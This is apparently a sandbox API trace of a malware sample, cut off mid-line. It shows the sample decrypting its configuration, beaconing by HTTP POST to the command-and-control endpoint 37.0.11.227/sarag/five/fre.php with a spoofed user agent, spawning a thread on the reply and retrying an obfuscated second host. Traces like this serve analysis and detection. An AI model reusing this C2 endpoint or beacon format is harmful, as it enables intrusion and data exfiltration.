[0305.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.624] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.625] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.625] GetProcessHeap () returned 0x690000 [0305.626] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0305.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.627] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0305.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.628] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0305.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.629] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0305.629] GetProcessHeap () returned 0x690000 [0305.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.629] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0305.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.630] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0305.631] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.631] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0305.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.632] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0305.632] GetProcessHeap () returned 0x690000 [0305.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0305.632] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0305.632] GetProcessHeap () returned 0x690000 [0305.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0305.632] socket (af=2, type=1, protocol=6) returned 0xa20 [0305.632] connect (s=0xa20, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0305.663] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0305.663] GetProcessHeap () returned 0x690000 [0305.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0305.663] GetProcessHeap () returned 0x690000 [0305.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0305.666] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.668] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0305.668] GetProcessHeap () returned 0x690000 [0305.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0305.668] GetProcessHeap () returned 0x690000 [0305.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.669] GetProcessHeap () returned 0x690000 [0305.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0305.669] GetProcessHeap () returned 0x690000 [0305.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0305.669] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.670] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0305.670] GetProcessHeap () returned 0x690000 [0305.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0305.670] GetProcessHeap () returned 0x690000 [0305.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.670] send (s=0xa20, buf=0x6ad508*, len=242, flags=0) returned 242 [0305.671] send (s=0xa20, buf=0x6aba40*, len=159, flags=0) returned 159 [0305.671] GetProcessHeap () returned 0x690000 [0305.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0305.671] recv (in: s=0xa20, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0305.748] GetProcessHeap () returned 0x690000 [0305.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0305.749] GetProcessHeap () returned 0x690000 [0305.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0305.749] GetProcessHeap () returned 0x690000 [0305.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0305.749] GetProcessHeap () returned 0x690000 [0305.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0305.751] closesocket (s=0xa20) returned 0 [0305.751] GetProcessHeap () returned 0x690000 [0305.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0305.752] GetProcessHeap () returned 0x690000 [0305.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.752] GetProcessHeap () returned 0x690000 [0305.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0305.752] GetProcessHeap () returned 0x690000 [0305.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0305.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc70) returned 0xa20 [0305.756] Sleep (dwMilliseconds=0xea60) [0305.757] GetProcessHeap () returned 0x690000 [0305.757] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0305.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0305.772] GetProcessHeap () returned 0x690000 [0305.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0305.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.773] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0305.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.774] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.778] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.778] GetProcessHeap () returned 0x690000 [0305.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0305.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.779] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0305.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.815] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0305.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.816] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0305.816] GetProcessHeap () returned 0x690000 [0305.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.820] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.821] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.822] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.823] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.823] GetProcessHeap () returned 0x690000 [0305.823] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0305.823] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.823] GetProcessHeap () returned 0x690000 [0305.823] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0305.823] GetProcessHeap () returned 0x690000 [0305.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.824] GetProcessHeap () returned 0x690000 [0305.824] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0305.824] GetProcessHeap () returned 0x690000 [0305.824] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0305.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.825] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.832] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0305.838] GetProcessHeap () returned 0x690000 [0305.838] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0305.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.841] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0305.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.842] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.843] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.843] GetProcessHeap () returned 0x690000 [0305.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0305.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.844] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0305.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.845] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0305.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.846] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0305.846] GetProcessHeap () returned 0x690000 [0305.846] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0305.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.847] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0305.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.848] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0305.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.849] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0305.850] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.852] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0305.852] GetProcessHeap () returned 0x690000 [0305.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0305.852] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0305.852] GetProcessHeap () returned 0x690000 [0305.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0305.852] socket (af=2, type=1, protocol=6) returned 0xa24 [0305.852] connect (s=0xa24, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0305.879] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0305.879] GetProcessHeap () returned 0x690000 [0305.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0305.879] GetProcessHeap () returned 0x690000 [0305.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0305.880] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.880] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0305.881] GetProcessHeap () returned 0x690000 [0305.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0305.881] GetProcessHeap () returned 0x690000 [0305.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.881] GetProcessHeap () returned 0x690000 [0305.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0305.881] GetProcessHeap () returned 0x690000 [0305.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0305.882] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0305.883] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0305.883] GetProcessHeap () returned 0x690000 [0305.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0305.883] GetProcessHeap () returned 0x690000 [0305.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0305.883] send (s=0xa24, buf=0x6ad508*, len=242, flags=0) returned 242 [0305.884] send (s=0xa24, buf=0x6aba40*, len=159, flags=0) returned 159 [0305.884] GetProcessHeap () returned 0x690000 [0305.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0305.884] recv (in: s=0xa24, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0305.961] GetProcessHeap () returned 0x690000 [0305.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0305.963] GetProcessHeap () returned 0x690000 [0305.964] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0305.964] GetProcessHeap () returned 0x690000 [0305.964] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0305.964] GetProcessHeap () returned 0x690000 [0305.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0305.965] closesocket (s=0xa24) returned 0 [0305.965] GetProcessHeap () returned 0x690000 [0305.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0305.965] GetProcessHeap () returned 0x690000 [0305.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0305.966] GetProcessHeap () returned 0x690000 [0305.967] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0305.967] GetProcessHeap () returned 0x690000 [0305.967] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0305.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x134c) returned 0xa24 [0305.969] Sleep (dwMilliseconds=0xea60) [0305.970] GetProcessHeap () returned 0x690000 [0305.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0305.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.971] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0305.984] GetProcessHeap () returned 0x690000 [0305.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0305.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.985] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0305.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.986] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.986] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.986] GetProcessHeap () returned 0x690000 [0305.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0305.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.988] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0305.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.989] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0305.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0305.990] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0305.990] GetProcessHeap () returned 0x690000 [0305.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0305.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.992] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0305.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.993] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0305.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.994] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0305.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0305.995] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.995] GetProcessHeap () returned 0x690000 [0305.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0305.995] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.995] GetProcessHeap () returned 0x690000 [0305.995] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0305.995] GetProcessHeap () returned 0x690000 [0305.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0305.996] GetProcessHeap () returned 0x690000 [0305.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0305.999] GetProcessHeap () returned 0x690000 [0305.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0306.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.000] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.006] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0306.012] GetProcessHeap () returned 0x690000 [0306.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0306.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.014] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0306.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.015] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.015] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.015] GetProcessHeap () returned 0x690000 [0306.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0306.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.017] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0306.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.018] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0306.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.018] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0306.018] GetProcessHeap () returned 0x690000 [0306.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0306.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.019] 